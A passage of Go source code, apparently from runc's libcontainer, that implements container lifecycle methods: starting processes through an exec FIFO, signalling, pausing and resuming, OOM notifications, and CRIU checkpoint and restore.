stats.Interfaces = append(stats.Interfaces, istats)
}
}
return stats, nil
}
func (c *linuxContainer) Set(config configs.Config) error {
c.m.Lock()
defer c.m.Unlock()
status, err := c.currentStatus()
if err != nil {
return err
}
if status == Stopped {
return newGenericError(errors.New("container not running"), ContainerNotRunning)
}
if err := c.cgroupManager.Set(&config); err != nil {
// Set configs back
if err2 := c.cgroupManager.Set(c.config); err2 != nil {
logrus.Warnf("Setting back cgroup configs failed due to error: %v, your state.json and actual configs might be inconsistent.", err2)
}
return err
}
if c.intelRdtManager != nil {
if err := c.intelRdtManager.Set(&config); err != nil {
// Set configs back
if err2 := c.intelRdtManager.Set(c.config); err2 != nil {
logrus.Warnf("Setting back intelrdt configs failed due to error: %v, your state.json and actual configs might be inconsistent.", err2)
}
return err
}
}
// After config setting succeed, update config and states
c.config = &config
_, err = c.updateState(nil)
return err
}
func (c *linuxContainer) Start(process *Process) error {
c.m.Lock()
defer c.m.Unlock()
if process.Init {
if err := c.createExecFifo(); err != nil {
return err
}
}
if err := c.start(process); err != nil {
if process.Init {
c.deleteExecFifo()
}
return err
}
return nil
}
func (c *linuxContainer) Run(process *Process) error {
if err := c.Start(process); err != nil {
return err
}
if process.Init {
return c.exec()
}
return nil
}
func (c *linuxContainer) Exec() error {
c.m.Lock()
defer c.m.Unlock()
return c.exec()
}
func (c *linuxContainer) exec() error {
path := filepath.Join(c.root, execFifoFilename)
pid := c.initProcess.pid()
blockingFifoOpenCh := awaitFifoOpen(path)
for {
select {
case result := <-blockingFifoOpenCh:
return handleFifoResult(result)
case <-time.After(time.Millisecond * 100):
stat, err := system.Stat(pid)
if err != nil || stat.State == system.Zombie {
// could be because process started, ran, and completed between our 100ms timeout and our system.Stat() check.
// see if the fifo exists and has data (with a non-blocking open, which will succeed if the writing process is complete).
if err := handleFifoResult(fifoOpen(path, false)); err != nil {
return errors.New("container process is already dead")
}
return nil
}
}
}
}
func readFromExecFifo(execFifo io.Reader) error {
data, err := ioutil.ReadAll(execFifo)
if err != nil {
return err
}
if len(data) <= 0 {
return errors.New("cannot start an already running container")
}
return nil
}
func awaitFifoOpen(path string) <-chan openResult {
fifoOpened := make(chan openResult)
go func() {
result := fifoOpen(path, true)
fifoOpened <- result
}()
return fifoOpened
}
func fifoOpen(path string, block bool) openResult {
flags := os.O_RDONLY
if !block {
flags |= unix.O_NONBLOCK
}
f, err := os.OpenFile(path, flags, 0)
if err != nil {
return openResult{err: newSystemErrorWithCause(err, "open exec fifo for reading")}
}
return openResult{file: f}
}
func handleFifoResult(result openResult) error {
if result.err != nil {
return result.err
}
f := result.file
defer f.Close()
if err := readFromExecFifo(f); err != nil {
return err
}
return os.Remove(f.Name())
}
type openResult struct {
file *os.File
err error
}
func (c *linuxContainer) start(process *Process) error {
parent, err := c.newParentProcess(process)
if err != nil {
return newSystemErrorWithCause(err, "creating new parent process")
}
parent.forwardChildLogs()
if err := parent.start(); err != nil {
// terminate the process to ensure that it properly is reaped.
if err := ignoreTerminateErrors(parent.terminate()); err != nil {
logrus.Warn(err)
}
return newSystemErrorWithCause(err, "starting container process")
}
// generate a timestamp indicating when the container was started
c.created = time.Now().UTC()
if process.Init {
c.state = &createdState{
c: c,
}
state, err := c.updateState(parent)
if err != nil {
return err
}
c.initProcessStartTime = state.InitProcessStartTime
if c.config.Hooks != nil {
s, err := c.currentOCIState()
if err != nil {
return err
}
for i, hook := range c.config.Hooks.Poststart {
if err := hook.Run(s); err != nil {
if err := ignoreTerminateErrors(parent.terminate()); err != nil {
logrus.Warn(err)
}
return newSystemErrorWithCausef(err, "running poststart hook %d", i)
}
}
}
}
return nil
}
func (c *linuxContainer) Signal(s os.Signal, all bool) error {
c.m.Lock()
defer c.m.Unlock()
if all {
return signalAllProcesses(c.cgroupManager, s)
}
status, err := c.currentStatus()
if err != nil {
return err
}
// to avoid a PID reuse attack
if status == Running || status == Created || status == Paused {
if err := c.initProcess.signal(s); err != nil {
return newSystemErrorWithCause(err, "signaling init process")
}
return nil
}
return newGenericError(errors.New("container not running"), ContainerNotRunning)
}
func (c *linuxContainer) createExecFifo() error {
rootuid, err := c.Config().HostRootUID()
if err != nil {
return err
}
rootgid, err := c.Config().HostRootGID()
if err != nil {
return err
}
fifoName := filepath.Join(c.root, execFifoFilename)
if _, err := os.Stat(fifoName); err == nil {
return fmt.Errorf("exec fifo %s already exists", fifoName)
}
oldMask := unix.Umask(0000)
if err := unix.Mkfifo(fifoName, 0622); err != nil {
unix.Umask(oldMask)
return err
}
unix.Umask(oldMask)
return os.Chown(fifoName, rootuid, rootgid)
}
func (c *linuxContainer) deleteExecFifo() {
fifoName := filepath.Join(c.root, execFifoFilename)
os.Remove(fifoName)
}
// includeExecFifo opens the container's execfifo as a pathfd, so that the
// container cannot access the statedir (and the FIFO itself remains
// un-opened). It then adds the FifoFd to the given exec.Cmd as an inherited
// fd, with _LIBCONTAINER_FIFOFD set to its fd number.
func (c *linuxContainer) includeExecFifo(cmd *exec.Cmd) error {
fifoName := filepath.Join(c.root, execFifoFilename)
fifoFd, err := unix.Open(fifoName, unix.O_PATH|unix.O_CLOEXEC, 0)
if err != nil {
return err
}
cmd.ExtraFiles = append(cmd.ExtraFiles, os.NewFile(uintptr(fifoFd), fifoName))
cmd.Env = append(cmd.Env,
fmt.Sprintf("_LIBCONTAINER_FIFOFD=%d", stdioFdCount+len(cmd.ExtraFiles)-1))
return nil
}
func (c *linuxContainer) newParentProcess(p *Process) (parentProcess, error) {
parentInitPipe, childInitPipe, err := utils.NewSockPair("init")
if err != nil {
return nil, newSystemErrorWithCause(err, "creating new init pipe")
}
messageSockPair := filePair{parentInitPipe, childInitPipe}
parentLogPipe, childLogPipe, err := os.Pipe()
if err != nil {
return nil, fmt.Errorf("Unable to create the log pipe: %s", err)
}
logFilePair := filePair{parentLogPipe, childLogPipe}
cmd := c.commandTemplate(p, childInitPipe, childLogPipe)
if !p.Init {
return c.newSetnsProcess(p, cmd, messageSockPair, logFilePair)
}
// We only set up fifoFd if we're not doing a `runc exec`. The historic
// reason for this is that previously we would pass a dirfd that allowed
// for container rootfs escape (and not doing it in `runc exec` avoided
// that problem), but we no longer do that. However, there's no need to do
// this for `runc exec` so we just keep it this way to be safe.
if err := c.includeExecFifo(cmd); err != nil {
return nil, newSystemErrorWithCause(err, "including execfifo in cmd.Exec setup")
}
return c.newInitProcess(p, cmd, messageSockPair, logFilePair)
}
func (c *linuxContainer) commandTemplate(p *Process, childInitPipe *os.File, childLogPipe *os.File) *exec.Cmd {
cmd := exec.Command(c.initPath, c.initArgs[1:]...)
cmd.Args[0] = c.initArgs[0]
cmd.Stdin = p.Stdin
cmd.Stdout = p.Stdout
cmd.Stderr = p.Stderr
cmd.Dir = c.config.Rootfs
if cmd.SysProcAttr == nil {
cmd.SysProcAttr = &unix.SysProcAttr{}
}
cmd.Env = append(cmd.Env, fmt.Sprintf("GOMAXPROCS=%s", os.Getenv("GOMAXPROCS")))
cmd.ExtraFiles = append(cmd.ExtraFiles, p.ExtraFiles...)
if p.ConsoleSocket != nil {
cmd.ExtraFiles = append(cmd.ExtraFiles, p.ConsoleSocket)
cmd.Env = append(cmd.Env,
fmt.Sprintf("_LIBCONTAINER_CONSOLE=%d", stdioFdCount+len(cmd.ExtraFiles)-1),
)
}
cmd.ExtraFiles = append(cmd.ExtraFiles, childInitPipe)
cmd.Env = append(cmd.Env,
fmt.Sprintf("_LIBCONTAINER_INITPIPE=%d", stdioFdCount+len(cmd.ExtraFiles)-1),
fmt.Sprintf("_LIBCONTAINER_STATEDIR=%s", c.root),
)
cmd.ExtraFiles = append(cmd.ExtraFiles, childLogPipe)
cmd.Env = append(cmd.Env,
fmt.Sprintf("_LIBCONTAINER_LOGPIPE=%d", stdioFdCount+len(cmd.ExtraFiles)-1),
fmt.Sprintf("_LIBCONTAINER_LOGLEVEL=%s", p.LogLevel),
)
// NOTE: when running a container with no PID namespace and the parent process spawning the container is
// PID1 the pdeathsig is being delivered to the container's init process by the kernel for some reason
// even with the parent still running.
if c.config.ParentDeathSignal > 0 {
cmd.SysProcAttr.Pdeathsig = unix.Signal(c.config.ParentDeathSignal)
}
return cmd
}
func (c *linuxContainer) newInitProcess(p *Process, cmd *exec.Cmd, messageSockPair, logFilePair filePair) (*initProcess, error) {
cmd.Env = append(cmd.Env, "_LIBCONTAINER_INITTYPE="+string(initStandard))
nsMaps := make(map[configs.NamespaceType]string)
for _, ns := range c.config.Namespaces {
if ns.Path != "" {
nsMaps[ns.Type] = ns.Path
}
}
_, sharePidns := nsMaps[configs.NEWPID]
data, err := c.bootstrapData(c.config.Namespaces.CloneFlags(), nsMaps)
if err != nil {
return nil, err
}
init := &initProcess{
cmd: cmd,
messageSockPair: messageSockPair,
logFilePair: logFilePair,
manager: c.cgroupManager,
intelRdtManager: c.intelRdtManager,
config: c.newInitConfig(p),
container: c,
process: p,
bootstrapData: data,
sharePidns: sharePidns,
}
c.initProcess = init
return init, nil
}
func (c *linuxContainer) newSetnsProcess(p *Process, cmd *exec.Cmd, messageSockPair, logFilePair filePair) (*setnsProcess, error) {
cmd.Env = append(cmd.Env, "_LIBCONTAINER_INITTYPE="+string(initSetns))
state, err := c.currentState()
if err != nil {
return nil, newSystemErrorWithCause(err, "getting container's current state")
}
// for setns process, we don't have to set cloneflags as the process namespaces
// will only be set via setns syscall
data, err := c.bootstrapData(0, state.NamespacePaths)
if err != nil {
return nil, err
}
return &setnsProcess{
cmd: cmd,
cgroupPaths: state.CgroupPaths,
rootlessCgroups: c.config.RootlessCgroups,
intelRdtPath: state.IntelRdtPath,
messageSockPair: messageSockPair,
logFilePair: logFilePair,
config: c.newInitConfig(p),
process: p,
bootstrapData: data,
initProcessPid: state.InitProcessPid,
}, nil
}
func (c *linuxContainer) newInitConfig(process *Process) *initConfig {
cfg := &initConfig{
Config: c.config,
Args: process.Args,
Env: process.Env,
User: process.User,
AdditionalGroups: process.AdditionalGroups,
Cwd: process.Cwd,
Capabilities: process.Capabilities,
PassedFilesCount: len(process.ExtraFiles),
ContainerId: c.ID(),
NoNewPrivileges: c.config.NoNewPrivileges,
RootlessEUID: c.config.RootlessEUID,
RootlessCgroups: c.config.RootlessCgroups,
AppArmorProfile: c.config.AppArmorProfile,
ProcessLabel: c.config.ProcessLabel,
Rlimits: c.config.Rlimits,
}
if process.NoNewPrivileges != nil {
cfg.NoNewPrivileges = *process.NoNewPrivileges
}
if process.AppArmorProfile != "" {
cfg.AppArmorProfile = process.AppArmorProfile
}
if process.Label != "" {
cfg.ProcessLabel = process.Label
}
if len(process.Rlimits) > 0 {
cfg.Rlimits = process.Rlimits
}
cfg.CreateConsole = process.ConsoleSocket != nil
cfg.ConsoleWidth = process.ConsoleWidth
cfg.ConsoleHeight = process.ConsoleHeight
return cfg
}
func (c *linuxContainer) Destroy() error {
c.m.Lock()
defer c.m.Unlock()
return c.state.destroy()
}
func (c *linuxContainer) Pause() error {
c.m.Lock()
defer c.m.Unlock()
status, err := c.currentStatus()
if err != nil {
return err
}
switch status {
case Running, Created:
if err := c.cgroupManager.Freeze(configs.Frozen); err != nil {
return err
}
return c.state.transition(&pausedState{
c: c,
})
}
return newGenericError(fmt.Errorf("container not running or created: %s", status), ContainerNotRunning)
}
func (c *linuxContainer) Resume() error {
c.m.Lock()
defer c.m.Unlock()
status, err := c.currentStatus()
if err != nil {
return err
}
if status != Paused {
return newGenericError(fmt.Errorf("container not paused"), ContainerNotPaused)
}
if err := c.cgroupManager.Freeze(configs.Thawed); err != nil {
return err
}
return c.state.transition(&runningState{
c: c,
})
}
func (c *linuxContainer) NotifyOOM() (<-chan struct{}, error) {
// XXX(cyphar): This requires cgroups.
if c.config.RootlessCgroups {
logrus.Warn("getting OOM notifications may fail if you don't have the full access to cgroups")
}
path := c.cgroupManager.Path("memory")
if cgroups.IsCgroup2UnifiedMode() {
return notifyOnOOMV2(path)
}
return notifyOnOOM(path)
}
func (c *linuxContainer) NotifyMemoryPressure(level PressureLevel) (<-chan struct{}, error) {
// XXX(cyphar): This requires cgroups.
if c.config.RootlessCgroups {
logrus.Warn("getting memory pressure notifications may fail if you don't have the full access to cgroups")
}
return notifyMemoryPressure(c.cgroupManager.Path("memory"), level)
}
var criuFeatures *criurpc.CriuFeatures
func (c *linuxContainer) checkCriuFeatures(criuOpts *CriuOpts, rpcOpts *criurpc.CriuOpts, criuFeat *criurpc.CriuFeatures) error {
var t criurpc.CriuReqType
t = criurpc.CriuReqType_FEATURE_CHECK
// make sure the features we are looking for are really not from
// some previous check
criuFeatures = nil
req := &criurpc.CriuReq{
Type: &t,
// Theoretically this should not be necessary but CRIU
// segfaults if Opts is empty.
// Fixed in CRIU 2.12
Opts: rpcOpts,
Features: criuFeat,
}
err := c.criuSwrk(nil, req, criuOpts, false, nil)
if err != nil {
logrus.Debugf("%s", err)
return errors.New("CRIU feature check failed")
}
logrus.Debugf("Feature check says: %s", criuFeatures)
missingFeatures := false
// The outer if checks if the fields actually exist
if (criuFeat.MemTrack != nil) &&
(criuFeatures.MemTrack != nil) {
// The inner if checks if they are set to true
if *criuFeat.MemTrack && !*criuFeatures.MemTrack {
missingFeatures = true
logrus.Debugf("CRIU does not support MemTrack")
}
}
// This needs to be repeated for every new feature check.
// Is there a way to put this in a function. Reflection?
if (criuFeat.LazyPages != nil) &&
(criuFeatures.LazyPages != nil) {
if *criuFeat.LazyPages && !*criuFeatures.LazyPages {
missingFeatures = true
logrus.Debugf("CRIU does not support LazyPages")
}
}
if missingFeatures {
return errors.New("CRIU is missing features")
}
return nil
}
func compareCriuVersion(criuVersion int, minVersion int) error {
// simple function to perform the actual version compare
if criuVersion < minVersion {
return fmt.Errorf("CRIU version %d must be %d or higher", criuVersion, minVersion)
}
return nil
}
// checkCriuVersion checks Criu version greater than or equal to minVersion
func (c *linuxContainer) checkCriuVersion(minVersion int) error {
// If the version of criu has already been determined there is no need
// to ask criu for the version again. Use the value from c.criuVersion.
if c.criuVersion != 0 {
return compareCriuVersion(c.criuVersion, minVersion)
}
criu := criu.MakeCriu()
var err error
c.criuVersion, err = criu.GetCriuVersion()
if err != nil {
return fmt.Errorf("CRIU version check failed: %s", err)
}
return compareCriuVersion(c.criuVersion, minVersion)
}
const descriptorsFilename = "descriptors.json"
func (c *linuxContainer) addCriuDumpMount(req *criurpc.CriuReq, m *configs.Mount) {
mountDest := m.Destination
if strings.HasPrefix(mountDest, c.config.Rootfs) {
mountDest = mountDest[len(c.config.Rootfs):]
}
extMnt := &criurpc.ExtMountMap{
Key: proto.String(mountDest),
Val: proto.String(mountDest),
}
req.Opts.ExtMnt = append(req.Opts.ExtMnt, extMnt)
}
func (c *linuxContainer) addMaskPaths(req *criurpc.CriuReq) error {
for _, path := range c.config.MaskPaths {
fi, err := os.Stat(fmt.Sprintf("/proc/%d/root/%s", c.initProcess.pid(), path))
if err != nil {
if os.IsNotExist(err) {
continue
}
return err
}
if fi.IsDir() {
continue
}
extMnt := &criurpc.ExtMountMap{
Key: proto.String(path),
Val: proto.String("/dev/null"),
}
req.Opts.ExtMnt = append(req.Opts.ExtMnt, extMnt)
}
return nil
}
func (c *linuxContainer) handleCriuConfigurationFile(rpcOpts *criurpc.CriuOpts) {
// CRIU will evaluate a configuration starting with release 3.11.
// Settings in the configuration file will overwrite RPC settings.
// Look for annotations. The annotation 'org.criu.config'
// specifies if CRIU should use a different, container specific
// configuration file.
_, annotations := utils.Annotations(c.config.Labels)
configFile, exists := annotations["org.criu.config"]
if exists {
// If the annotation 'org.criu.config' exists and is set
// to a non-empty string, tell CRIU to use that as a
// configuration file. If the file does not exist, CRIU
// will just ignore it.
if configFile != "" {
rpcOpts.ConfigFile = proto.String(configFile)
}
// If 'org.criu.config' exists and is set to an empty
// string, a runc specific CRIU configuration file will
// be not set at all.
} else {
// If the mentioned annotation has not been found, specify
// a default CRIU configuration file.
rpcOpts.ConfigFile = proto.String("/etc/criu/runc.conf")
}
}
func (c *linuxContainer) Checkpoint(criuOpts *CriuOpts) error {
c.m.Lock()
defer c.m.Unlock()
// Checkpoint is unlikely to work if os.Geteuid() != 0 || system.RunningInUserNS().
// (CLI prints a warning)
// TODO(avagin): Figure out how to make this work nicely. CRIU 2.0 has
// support for doing unprivileged dumps, but the setup of
// rootless containers might make this complicated.
// We are relying on the CRIU version RPC which was introduced with CRIU 3.0.0
if err := c.checkCriuVersion(30000); err != nil {
return err
}
if criuOpts.ImagesDirectory == "" {
return errors.New("invalid directory to save checkpoint")
}
// Since a container can be C/R'ed multiple times,
// the checkpoint directory may already exist.
if err := os.Mkdir(criuOpts.ImagesDirectory, 0700); err != nil && !os.IsExist(err) {
return err
}
if criuOpts.WorkDirectory == "" {
criuOpts.WorkDirectory = filepath.Join(c.root, "criu.work")
}
if err := os.Mkdir(criuOpts.WorkDirectory, 0700); err != nil && !os.IsExist(err) {
return err
}
workDir, err := os.Open(criuOpts.WorkDirectory)
if err != nil {
return err
}
defer workDir.Close()
imageDir, err := os.Open(criuOpts.ImagesDirectory)
if err != nil {
return err
}
defer imageDir.Close()
rpcOpts := criurpc.CriuOpts{
ImagesDirFd: proto.Int32(int32(imageDir.Fd())),
WorkDirFd: proto.Int32(int32(workDir.Fd())),
LogLevel: proto.Int32(4),
LogFile: proto.String("dump.log"),
Root: proto.String(c.config.Rootfs),
ManageCgroups: proto.Bool(true),
NotifyScripts: proto.Bool(true),
Pid: proto.Int32(int32(c.initProcess.pid())),
ShellJob: proto.Bool(criuOpts.ShellJob),
LeaveRunning: proto.Bool(criuOpts.LeaveRunning),
TcpEstablished: proto.Bool(criuOpts.TcpEstablished),
ExtUnixSk: proto.Bool(criuOpts.ExternalUnixConnections),
FileLocks: proto.Bool(criuOpts.FileLocks),
EmptyNs: proto.Uint32(criuOpts.EmptyNs),
OrphanPtsMaster: proto.Bool(true),
AutoDedup: proto.Bool(criuOpts.AutoDedup),
LazyPages: proto.Bool(criuOpts.LazyPages),
}
c.handleCriuConfigurationFile(&rpcOpts)
// If the container is running in a network namespace and has
// a path to the network namespace configured, we will dump
// that network namespace as an external namespace and we
// will expect that the namespace exists during restore.
// This basically means that CRIU will ignore the namespace
// and expect to be setup correctly.
nsPath := c.config.Namespaces.PathOf(configs.NEWNET)
if nsPath != "" {
// For this to work we need at least criu 3.11.0 => 31100.
// As there was already a successful version check we will
// not error out if it fails. runc will just behave as it used
// to do and ignore external network namespaces.
err := c.checkCriuVersion(31100)
if err == nil {
// CRIU expects the information about an external namespace
// like this: --external net[<inode>]:<key>
// This <key> is always 'extRootNetNS'.
var netns unix.Stat_t
err = unix.Stat(nsPath, &netns)
if err != nil {
return err
}
criuExternal := fmt.Sprintf("net[%d]:extRootNetNS", netns.Ino)
rpcOpts.External = append(rpcOpts.External, criuExternal)
}
}
// CRIU can use cgroup freezer; when rpcOpts.FreezeCgroup
// is not set, CRIU uses ptrace() to pause the processes.
// Note cgroup v2 freezer is only supported since CRIU release 3.14.
if !cgroups.IsCgroup2UnifiedMode() || c.checkCriuVersion(31400) == nil {
if fcg := c.cgroupManager.Path("freezer"); fcg != "" {
rpcOpts.FreezeCgroup = proto.String(fcg)
}
}
// append optional criu opts, e.g., page-server and port
if criuOpts.PageServer.Address != "" && criuOpts.PageServer.Port != 0 {
rpcOpts.Ps = &criurpc.CriuPageServerInfo{
Address: proto.String(criuOpts.PageServer.Address),
Port: proto.Int32(criuOpts.PageServer.Port),
}
}
//pre-dump may need parentImage param to complete iterative migration
if criuOpts.ParentImage != "" {
rpcOpts.ParentImg = proto.String(criuOpts.ParentImage)
rpcOpts.TrackMem = proto.Bool(true)
}
// append optional manage cgroups mode
if criuOpts.ManageCgroupsMode != 0 {
mode := criurpc.CriuCgMode(criuOpts.ManageCgroupsMode)
rpcOpts.ManageCgroupsMode = &mode
}
var t criurpc.CriuReqType
if criuOpts.PreDump {
feat := criurpc.CriuFeatures{
MemTrack: proto.Bool(true),
}
if err := c.checkCriuFeatures(criuOpts, &rpcOpts, &feat); err != nil {
return err
}
t = criurpc.CriuReqType_PRE_DUMP
} else {
t = criurpc.CriuReqType_DUMP
}
if criuOpts.LazyPages {
// lazy migration requested; check if criu supports it
feat := criurpc.CriuFeatures{
LazyPages: proto.Bool(true),
}
if err := c.checkCriuFeatures(criuOpts, &rpcOpts, &feat); err != nil {
return err
}
if fd := criuOpts.StatusFd; fd != -1 {
// check that the FD is valid
flags, err := unix.FcntlInt(uintptr(fd), unix.F_GETFL, 0)
if err != nil {
return fmt.Errorf("invalid --status-fd argument %d: %w", fd, err)
}
// and writable
if flags&unix.O_WRONLY == 0 {
return fmt.Errorf("invalid --status-fd argument %d: not writable", fd)
}
rpcOpts.StatusFd = proto.Int32(int32(fd))
}
}
req := &criurpc.CriuReq{
Type: &t,
Opts: &rpcOpts,
}
// no need to dump all this in pre-dump
if !criuOpts.PreDump {
hasCgroupns := c.config.Namespaces.Contains(configs.NEWCGROUP)
for _, m := range c.config.Mounts {
switch m.Device {
case "bind":
c.addCriuDumpMount(req, m)
case "cgroup":
if cgroups.IsCgroup2UnifiedMode() || hasCgroupns {
// real mount(s)
continue
}
// a set of "external" bind mounts
binds, err := getCgroupMounts(m)
if err != nil {
return err
}
for _, b := range binds {
c.addCriuDumpMount(req, b)
}
}
}
if err := c.addMaskPaths(req); err != nil {
return err
}
for _, node := range c.config.Devices {
m := &configs.Mount{Destination: node.Path, Source: node.Path}
c.addCriuDumpMount(req, m)
}
// Write the FD info to a file in the image directory
fdsJSON, err := json.Marshal(c.initProcess.externalDescriptors())
if err != nil {
return err
}
err = ioutil.WriteFile(filepath.Join(criuOpts.ImagesDirectory, descriptorsFilename), fdsJSON, 0600)
if err != nil {
return err
}
}
err = c.criuSwrk(nil, req, criuOpts, false, nil)
if err != nil {
return err
}
return nil
}
func (c *linuxContainer) addCriuRestoreMount(req *criurpc.CriuReq, m *configs.Mount) {
mountDest := m.Destination
if strings.HasPrefix(mountDest, c.config.Rootfs) {
mountDest = mountDest[len(c.config.Rootfs):]
}
extMnt := &criurpc.ExtMountMap{
Key: proto.String(mountDest),
Val: proto.String(m.Source),
}
req.Opts.ExtMnt = append(req.Opts.ExtMnt, extMnt)
}
func (c *linuxContainer) restoreNetwork(req *criurpc.CriuReq, criuOpts *CriuOpts) {
for _, iface := range c.config.Networks {
switch iface.Type {
case "veth":
veth := new(criurpc.CriuVethPair)
veth.IfOut = proto.String(iface.HostInterfaceName)
veth.IfIn = proto.String(iface.Name)
req.Opts.Veths = append(req.Opts.Veths, veth)
case "loopback":
// Do nothing
}
}
for _, i := range criuOpts.VethPairs {
veth := new(criurpc.CriuVethPair)
veth.IfOut = proto.String(i.HostInterfaceName)
veth.IfIn = proto.String(i.ContainerInterfaceName)
req.Opts.Veths = append(req.Opts.Veths, veth)
}
}
// makeCriuRestoreMountpoints makes the actual mountpoints for the
// restore using CRIU. This function is inspired from the code in
// rootfs_linux.go
func (c *linuxContainer) makeCriuRestoreMountpoints(m *configs.Mount) error {
switch m.Device {
case "cgroup":
// No mount point(s) need to be created:
//
// * for v1, mount points are saved by CRIU because
// /sys/fs/cgroup is a tmpfs mount
//
// * for v2, /sys/fs/cgroup is a real mount, but
// the mountpoint appears as soon as /sys is mounted
return nil
case "bind":
// The prepareBindMount() function checks if source
// exists. So it cannot be used for other filesystem types.
if err := prepareBindMount(m, c.config.Rootfs); err != nil {
return err
}
default:
// for all other filesystems just create the mountpoints
dest, err := securejoin.SecureJoin(c.config.Rootfs, m.Destination)
if err != nil {
return err
}
if err := checkProcMount(c.config.Rootfs, dest, ""); err != nil {
return err
}
m.Destination = dest
if err := os.MkdirAll(dest, 0755); err != nil {
return err
}
}
return nil
}
// isPathInPrefixList is a small function for CRIU restore to make sure
// mountpoints, which are on a tmpfs, are not created in the roofs
func isPathInPrefixList(path string, prefix []string) bool {
for _, p := range prefix {
if strings.HasPrefix(path, p+"/") {
return true
}
}
return false
}
// prepareCriuRestoreMounts tries to set up the rootfs of the
// container to be restored in the same way runc does it for
// initial container creation. Even for a read-only rootfs container
// runc modifies the rootfs to add mountpoints which do not exist.
// This function also creates missing mountpoints as long as they
// are not on top of a tmpfs, as CRIU will restore tmpfs content anyway.
func (c *linuxContainer) prepareCriuRestoreMounts(mounts []*configs.Mount) error {
// First get a list of a all tmpfs mounts
tmpfs := []string{}
for _, m := range mounts {
switch m.Device {
case "tmpfs":
tmpfs = append(tmpfs, m.Destination)
}
}
// Now go through all mounts and create the mountpoints
// if the mountpoints are not on a tmpfs, as CRIU will
// restore the complete tmpfs content from its checkpoint.
for _, m := range mounts {
if !isPathInPrefixList(m.Destination, tmpfs) {
if err := c.makeCriuRestoreMountpoints(m); err != nil {
return err
}
}
}
return nil
}
func (c *linuxContainer) Restore(process *Process, criuOpts *CriuOpts) error {
c.m.Lock()
defer c.m.Unlock()
var extraFiles []*os.File
// Restore is unlikely to work if os.Geteuid() != 0 || system.RunningInUserNS().
// (CLI prints a warning)
// TODO(avagin): Figure out how to make this work nicely. CRIU doesn't have
// support for unprivileged restore at the moment.
// We are relying on the CRIU version RPC which was introduced with CRIU 3.0.0
if err := c.checkCriuVersion(30000); err != nil {
return err
}
if criuOpts.WorkDirectory == "" {
criuOpts.WorkDirectory = filepath.Join(c.root, "criu.work")
}
// Since a container can be C/R'ed multiple times,
// the work directory may already exist.
if err := os.Mkdir(criuOpts.WorkDirectory, 0700); err != nil && !os.IsExist(err) {
return err
}
workDir, err := os.Open(criuOpts.WorkDirectory)
if err != nil {
return err
}
defer workDir.Close()
if criuOpts.ImagesDirectory == "" {
return errors.New("invalid directory to restore checkpoint")
}
imageDir, err := os.Open(criuOpts.ImagesDirectory)
if err != nil {
return err
}
defer imageDir.Close()
// CRIU has a few requirements for a root directory:
// * it must be a mount point
// * its parent must not be overmounted
// c.config.Rootfs is bind-mounted to a temporary directory
// to satisfy these requirements.
root := filepath.Join(c.root, "criu-root")
if err := os.Mkdir(root, 0755); err != nil {
return err
}
defer os.Remove(root)
root, err = filepath.EvalSymlinks(root)
if err != nil {
return err
}
err = unix.Mount(c.config.Rootfs, root, "", unix.MS_BIND|unix.MS_REC, "")
if err != nil {
return err
}
defer unix.Unmount(root, unix.MNT_DETACH)
t := criurpc.CriuReqType_RESTORE
req := &criurpc.CriuReq{
Type: &t,
Opts: &criurpc.CriuOpts{
ImagesDirFd: proto.Int32(int32(imageDir.Fd())),
WorkDirFd: proto.Int32(int32(workDir.Fd())),
EvasiveDevices: proto.Bool(true),
LogLevel: proto.Int32(4),
LogFile: proto.String("restore.log"),
RstSibling: proto.Bool(true),
Root: proto.String(root),
ManageCgroups: proto.Bool(true),
NotifyScripts: proto.Bool(true),
ShellJob: proto.Bool(criuOpts.ShellJob),
ExtUnixSk: proto.Bool(criuOpts.ExternalUnixConnections),
TcpEstablished: proto.Bool(criuOpts.TcpEstablished),
FileLocks: proto.Bool(criuOpts.FileLocks),
EmptyNs: proto.Uint32(criuOpts.EmptyNs),
OrphanPtsMaster: proto.Bool(true),
AutoDedup: proto.Bool(criuOpts.AutoDedup),
LazyPages: proto.Bool(criuOpts.LazyPages),
},
}
c.handleCriuConfigurationFile(req.Opts)
// Same as during checkpointing. If the container has a specific network namespace
// assigned to it, this now expects that the checkpoint will be restored in a
// already created network namespace.
nsPath := c.config.Namespaces.PathOf(configs.NEWNET)
if nsPath != "" {
// For this to work we need at least criu 3.11.0 => 31100.
// As there was already a successful version check we will
// not error out if it fails. runc will just behave as it used
// to do and ignore external network namespaces.
err := c.checkCriuVersion(31100)
if err == nil {
// CRIU wants the information about an existing network namespace
// like this: --inherit-fd fd[<fd>]:<key>
// The <key> needs to be the same as during checkpointing.
// We are always using 'extRootNetNS' as the key in this.
netns, err := os.Open(nsPath)
if err != nil {
logrus.Errorf("If a specific network namespace is defined it must exist: %s", err)
return fmt.Errorf("Requested network namespace %v does not exist", nsPath)
}
defer netns.Close()
inheritFd := new(criurpc.InheritFd)
inheritFd.Key = proto.String("extRootNetNS")
// The offset of four is necessary because 0, 1, 2 and 3 is already
// used by stdin, stdout, stderr, 'criu swrk' socket.
inheritFd.Fd = proto.Int32(int32(4 + len(extraFiles)))
req.Opts.InheritFd = append(req.Opts.InheritFd, inheritFd)
// All open FDs need to be transferred to CRIU via extraFiles
extraFiles = append(extraFiles, netns)
}
}
// This will modify the rootfs of the container in the same way runc
// modifies the container during initial creation.
if err := c.prepareCriuRestoreMounts(c.config.Mounts); err != nil {
return err
}
hasCgroupns := c.config.Namespaces.Contains(configs.NEWCGROUP)
for _, m := range c.config.Mounts {
switch m.Device {
case "bind":
c.addCriuRestoreMount(req, m)
case "cgroup":
if cgroups.IsCgroup2UnifiedMode() || hasCgroupns {
continue
}
// cgroup v1 is a set of bind mounts, unless cgroupns is used
binds, err := getCgroupMounts(m)
if err != nil {
return err
}
for _, b := range binds {
c.addCriuRestoreMount(req, b)
}
}
}
if len(c.config.MaskPaths) > 0 {
m := &configs.Mount{Destination: "/dev/null", Source: "/dev/null"}
c.addCriuRestoreMount(req, m)
}
for _, node := range c.config.Devices {
m := &configs.Mount{Destination: node.Path, Source: node.Path}
c.addCriuRestoreMount(req, m)
}
if criuOpts.EmptyNs&unix.CLONE_NEWNET == 0 {
c.restoreNetwork(req, criuOpts)
}
// append optional manage cgroups mode
if criuOpts.ManageCgroupsMode != 0 {
mode := criurpc.CriuCgMode(criuOpts.ManageCgroupsMode)
req.Opts.ManageCgroupsMode = &mode
}
var (
fds []string
fdJSON []byte
)
if fdJSON, err = ioutil.ReadFile(filepath.Join(criuOpts.ImagesDirectory, descriptorsFilename)); err != nil {
return err
}
if err := json.Unmarshal(fdJSON, &fds); err != nil {
return err
}
for i := range fds {
if s := fds[i]; strings.Contains(s, "pipe:") {
